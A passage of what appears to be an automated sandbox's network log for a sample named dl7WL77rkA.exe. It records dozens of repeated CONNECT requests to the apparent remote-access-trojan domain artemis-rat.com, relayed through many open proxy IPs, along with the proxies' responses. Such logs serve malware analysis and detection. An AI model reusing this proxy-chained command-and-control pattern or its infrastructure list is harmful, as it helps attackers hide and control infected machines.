                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.284285069 CET65INHTTP/1.1 200 Connection Established
                                                                                                                                                                                                                                                            Proxy-Agent: Zscaler/6.3


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            630192.168.2.55087451.158.125.135163793876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.015259981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.093031883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.202440977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.202210903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.561347008 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            631192.168.2.55181213.234.24.11610803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.020499945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.405863047 CET116INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            632192.168.2.55182395.140.124.16110803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.023770094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            633192.168.2.550956138.0.228.12080803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.029817104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.369398117 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            634192.168.2.550905185.23.118.97573773876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.054480076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.093034983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.202419996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.202212095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            635192.168.2.551002194.4.50.132123343876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.060780048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            636192.168.2.551071194.182.178.9031283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.094304085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.426320076 CET28INHTTP/1.1 400 Bad Request


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            637192.168.2.550926203.96.177.211333823876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.095067978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.108166933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.124727011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.217721939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            638192.168.2.551842139.59.1.1480803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.095366955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.690907955 CET28INHTTP/1.1 400 Bad Request


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            639192.168.2.55183743.133.136.20888003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.096627951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            640192.168.2.550936161.97.173.42622893876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.096688986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.108165979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.124744892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.217777014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            641192.168.2.550974213.136.79.177387723876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.106616020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.201765060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.202899933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.202224016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:04.201805115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            642192.168.2.55101298.162.25.4316543876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.116211891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            643192.168.2.551889104.16.105.182803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.151587009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.305865049 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            644192.168.2.551867150.136.153.231803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.156519890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:12.446701050 CET97INHTTP/1.0 200 Connection Established
                                                                                                                                                                                                                                                            Proxy-agent: Apache/2.4.37 (Oracle Linux) OpenSSL/1.1.1k
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:13.149589062 CET97INHTTP/1.0 200 Connection Established
                                                                                                                                                                                                                                                            Proxy-agent: Apache/2.4.37 (Oracle Linux) OpenSSL/1.1.1k
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:13.853672981 CET97INHTTP/1.0 200 Connection Established
                                                                                                                                                                                                                                                            Proxy-agent: Apache/2.4.37 (Oracle Linux) OpenSSL/1.1.1k
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:15.197860003 CET97INHTTP/1.0 200 Connection Established
                                                                                                                                                                                                                                                            Proxy-agent: Apache/2.4.37 (Oracle Linux) OpenSSL/1.1.1k
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:17.886706114 CET97INHTTP/1.0 200 Connection Established
                                                                                                                                                                                                                                                            Proxy-agent: Apache/2.4.37 (Oracle Linux) OpenSSL/1.1.1k
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:23.197649956 CET97INHTTP/1.0 200 Connection Established
                                                                                                                                                                                                                                                            Proxy-agent: Apache/2.4.37 (Oracle Linux) OpenSSL/1.1.1k
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:33.949639082 CET97INHTTP/1.0 200 Connection Established
                                                                                                                                                                                                                                                            Proxy-agent: Apache/2.4.37 (Oracle Linux) OpenSSL/1.1.1k
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:55.454648018 CET97INHTTP/1.0 200 Connection Established
                                                                                                                                                                                                                                                            Proxy-agent: Apache/2.4.37 (Oracle Linux) OpenSSL/1.1.1k


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            645192.168.2.55091945.86.87.6680803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.171080112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.217530966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.806389093 CET202INHTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                            Content-Length: 715
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:20:47 GMT
                                                                                                                                                                                                                                                            Expires: Mon, 11 Mar 2024 02:20:47 GMT
                                                                                                                                                                                                                                                            Server: Mikrotik HttpProxy
                                                                                                                                                                                                                                                            Proxy-Connection: close


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            646192.168.2.551035212.110.188.216344053876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.171490908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.201942921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.202898026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.202224970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:56.288724899 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            647192.168.2.551927104.22.37.236803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.187088013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.342483044 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
